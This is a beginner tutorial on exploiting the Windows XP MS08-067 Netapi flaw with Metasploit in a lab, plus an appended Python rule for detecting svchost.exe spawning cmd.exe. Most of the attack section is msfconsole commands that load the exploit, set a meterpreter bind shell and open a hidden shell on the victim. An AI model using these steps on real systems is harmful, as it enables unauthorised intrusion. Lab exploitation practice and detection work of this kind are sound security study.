March 7, 2016
Windows XP Netapi Exploitation
In this article, I'll show you how easily you can exploit a system running Windows XP using the Netapi exploit. Before we start, you might be wondering why you'd exploit an old version of Windows. My answer is: you gotta take baby steps before you can run.

Lab setup:
-> A Windows XP virtual machine with SP2/SP3 (I used SP2)
-> A Kali virtual machine / standalone system

I'll leave finding the host on the network and identifying the services it runs up to you. Let's assume you've found the IP address of your victim, say 192.168.1.5, and that your attacker machine is at 192.168.1.6.

In your terminal on Kali, open up Metasploit. The framework lives in:

/usr/share/metasploit-framework

In here you'll find msfconsole; run it (it takes a moment to open). Now we search for the Netapi exploit:

msf > search netapi

You'll be shown a number of results, among which you'll find:

exploit/windows/smb/ms08_067_netapi

Copy this and paste it as follows:

msf > use exploit/windows/smb/ms08_067_netapi

Now you'll get the prompt:

msf exploit(ms08_067_netapi) >

The exploit is chosen and we need to set certain parameters for it:

msf exploit(ms08_067_netapi) > show options

Set RHOST and RPORT if they aren't already set by default. RHOST (the remote host, i.e. the victim) is set as follows:

msf exploit(ms08_067_netapi) > set rhost 192.168.1.5

The port number for the remote host (RPORT) is set to 445 by default.

Our exploit is ready, but we need a payload for the exploitation. There are a number of payloads available, which can be searched as follows:

msf exploit(ms08_067_netapi) > search payload

I've tried both a bind shell and a reverse shell. Here, we'll go with the bind shell:

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

Just as we set certain parameters for the exploit before, we need to do the same for the payload:

msf exploit(ms08_067_netapi) > show options

Set LPORT and LHOST, which are the port number and IP address of the local/attacker machine:

msf exploit(ms08_067_netapi) > set lhost 192.168.1.6

We're all set:

msf exploit(ms08_067_netapi) > exploit

If you've followed the steps correctly, you will be presented with a meterpreter prompt. To get the Windows cmd, type in the following command:

meterpreter > execute -f cmd.exe -c -H

A channel will be created, and the output will look like this:

Channel 1 created.

meterpreter > interact 1

You'll have the cmd of the victim!

While choosing the exploit, you can use `show targets` to see which OS versions are vulnerable to this exploit.

The exploitation could also have been done with the payload:

windows/shell_bind_tcp

but I went for meterpreter instead. Read about meterpreter to know why. Here are a few links that you may find useful:

https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
http://resources.infosecinstitute.com/icmp-reverse-shell/
https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi

If you've just started with exploitation, there may be a lot of doubts, so do connect with me.
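For the defensive side of the walkthrough above, here is an added example that is not part of the original post. The `execute -f cmd.exe -c -H` step starts a hidden cmd.exe from inside the exploited Server service, which on Windows XP runs inside svchost.exe, so a service host spawning a shell is the process-tree artifact a blue team can look for. The script below parses constructed, Sysmon-style process-creation log lines (the field names `Image`, `ParentImage` and `CommandLine` follow Sysmon's naming; the sample lines themselves are made up for this demo) and flags a cmd.exe whose parent is svchost.exe.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events in a Sysmon-like key=value form.
# These are not real captures. The third line mimics the hidden cmd.exe that
# "execute -f cmd.exe -c -H" starts inside the exploited Server service
# (hosted by svchost.exe on Windows XP); the first two are normal activity.
SAMPLE_EVENTS = [
    'Image=C:\\WINDOWS\\system32\\svchost.exe ParentImage=C:\\WINDOWS\\system32\\services.exe CommandLine="svchost.exe -k netsvcs"',
    'Image=C:\\WINDOWS\\system32\\cmd.exe ParentImage=C:\\WINDOWS\\explorer.exe CommandLine="cmd.exe"',
    'Image=C:\\WINDOWS\\system32\\cmd.exe ParentImage=C:\\WINDOWS\\system32\\svchost.exe CommandLine="cmd.exe"',
]

# Child images a service host has no ordinary reason to spawn (hypothetical list,
# extend it to match the environment being monitored).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe"}
SERVICE_HOST = "svchost.exe"

# Matches Key=value or Key="quoted value with spaces".
_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value log line into a dict, stripping surrounding quotes."""
    return {key: value.strip('"') for key, value in _FIELD.findall(line)}


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_service_spawned_shell(event: Dict[str, str]) -> bool:
    """True when svchost.exe is the direct parent of a shell-like child."""
    child = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    return parent == SERVICE_HOST and child in SUSPICIOUS_CHILDREN


def find_alerts(lines: List[str]) -> List[Dict[str, str]]:
    """Run the rule over raw log lines and return one alert record per hit."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if is_service_spawned_shell(event):
            alerts.append({
                "child": event["Image"],
                "parent": event["ParentImage"],
                "cmdline": event.get("CommandLine", ""),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(f"ALERT: {alert['parent']} spawned {alert['child']} ({alert['cmdline']})")
```

Running it prints a single alert for the third sample line. Legitimate svchost.exe children do exist (scheduled tasks, for instance), so in practice the `CommandLine` field and the service group of the parent are what separate a real hit from noise; the point of the rule is the parent/child pairing, not the image name alone.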